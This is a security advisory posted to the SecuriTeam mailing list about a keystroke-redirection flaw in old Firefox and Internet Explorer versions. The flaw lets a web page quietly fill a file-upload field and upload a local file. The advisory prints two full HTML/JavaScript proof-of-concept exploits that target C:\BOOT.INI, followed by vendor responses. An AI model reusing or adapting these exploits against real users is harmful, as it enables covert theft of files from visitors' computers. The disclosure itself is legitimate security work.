[NEWS] Multiple Browsers File Upload Data Disclosure

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Multiple Browsers File Upload Data Disclosure
------------------------------------------------------------------------


SUMMARY

" <http://www.w3.org/TR/html4/interact/forms.html#file-select> file select
- This control type allows the user to select files so that their contents
may be submitted with a form. The INPUT element is used to create a file
select control."

A keyboard handling feature with multiple browsers allows attackers to
retrieve sensitive information form the client by using file upload in web
browsers.

DETAILS

Vulnerable Systems:
* Mozilla Firefox 1.5.0.3 and prior
* Internet Explorer 7 and prior

The problem exists both with Internet Explorer and Firefox, when attackers
can filter the keystrokes entered in a form and 'bounce' the input over to
the file input box, then bounce back to the previous text entry, making it
appear as if nothing has happened.

By doing so, attackers can upload sensitive information from client
computer without user intervention and without user knowledge.

Firefox Proof of Concept:
/*
Instructions:
Copy paste this into an editor. Load in firefox. click in text box
on right pane. type the letter 'c', notice it appear in file input box.
Press the letter 'a', notice it not appear. press ':', appearrs.
Will filter out the string "c:\boot.ini".
*/
<HTML>
<HEAD>
<style type="text/css">
first {
}
second {
color: white;
background-color: white;
opacity: 0;
}
</style>
<SCRIPT>
//document.onKeyDown = doKeyPress;

//document.onKeyUp = doKeyUp;
var saved;
var e ;
var mystring = "C:\\BOOT.INI";
//var i=mystring.length-1;
var i=0;
function doKeyPress(chucky)
{
saved = chucky.which;
//alert('pressed ' + String.fromCharCode(saved) + '(' + saved + ')');
if (mystring[i] != String.fromCharCode(saved).toUpperCase() ||
i > mystring.length-1) {
return false;
}
i++;
return true;
};
function doKeyUp () {

document.forms[0].txt.value += String.fromCharCode(saved);
document.forms[0].txt.focus();

}

</SCRIPT>
</HEAD>
<BODY >
<FORM METHOD=POST action=file.php>
<INPUT id='asdf' name="fileupload" defaultValue='asdfasdf' TYPE=FILE
OnKeyUp="doKeyUp();"
OnKeyPress="return doKeyPress(event);">
<input name=txt id='txt' type=text value=''
OnKeyDown="document.forms[0].fileupload.focus();"
onClick="">
<input type=button value="invisible"
onclick="document.forms[0].fileupload.className='second';">
<input type=button value="visible"
onclick="document.forms[0].fileupload.className='first';">

</FORM>
</BODY>
</HTML>

Internet Explorer Proof of Concept:
/*
Description: Same thing as above.
Instructions: turn on CAPSLOCK (lame). click in text box. press 'I'.
press 'N', press 'I' press '.' etc.... will filter out C:\BOOT.INI.

CODE:
*/
<HTML>
<HEAD>
<SCRIPT>
//document.onKeyDown = doKeyPress;

//document.onKeyUp = doKeyUp;
var saved;
var e ;
var mystring = "C:\\BOOT.INI";
var i=mystring.length-1;

function doKeyPress () {
e = window.event;
saved = e.keyCode;
window.status = "e.keyCode == " + e.keyCode + "character is " +
mystring.charCodeAt(i);
if(e.keyCode != mystring.charCodeAt(i))
{
//e.keyCode =0;
e.returnValue=false;
e.cancelBubble=true;
}
else {
i--;
}
document.forms[0].fileupload.focus();

}

function doKeyUp () {

document.forms[0].txt.value += String.fromCharCode(saved);
document.forms[0].txt.focus();

}

function switchtype() {
/* var e = document.getElementById('txt');
document.forms[0].txt.setAttribute("type", "file");
e.setAttribute("value", "asfasfsd");
*/
}

function fux0rKeys() {
}
</SCRIPT>
</HEAD>
<BODY onload="document.forms[0].txt.value='sometext';
document.forms[0].fileupload.value='asdfsdfadsf';">
<FORM METHOD=POST action=file.php>
<INPUT id='asdf' name="fileupload" defaultValue='asdfasdf' TYPE=FILE
OnKeyUp="doKeyUp();"
OnKeyPress="doKeyPress();">
<input name=txt id='txt' type=text value='asdfsdafasdf'
OnKeyDown="document.forms[0].fileupload.focus();"
asdfnKeyDown="document.forms[0].txt.fireEvent('onKeyPress');"
onClick=""> visible
</FORM>
</BODY>
</HTML>

Vendor Status:
Microsoft Response: "Thank you, we'll put it in IE 7.
p.s. you might want to check in with firefox, i think someone reported
this a few years ago and they were vulnerable too.
kthxbye"

Mozilla Response:
A. "This will be fixed in Firefox 1.5 Beta -- see bug 258875. Two reasons
the fix took so long are (1) other browsers are also vulnerable and (2)
the only real fix, not letting users edit the filename field directly,
reduces usability in the non-attack case."

B. "I was wrong when I said "This will be fixed in Firefox 1.5 Beta". It
is fixed on trunk (for Firefox 3 at least), but it wasn't fixed in Firefox
1.5.0.0.

*** This bug has been marked as a duplicate of 258875 ***"


ADDITIONAL INFORMATION

The information has been provided by
<mailto:cmcauley@xxxxxxxxxxxxxxxxxxxxx> Charles McAuley.
Bugzilla Bug Reports:
<https://bugzilla.mozilla.org/show_bug.cgi?id=56236>
https://bugzilla.mozilla.org/show_bug.cgi?id=56236,
<https://bugzilla.mozilla.org/show_bug.cgi?id=258875>
https://bugzilla.mozilla.org/show_bug.cgi?id=258875



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Quantcast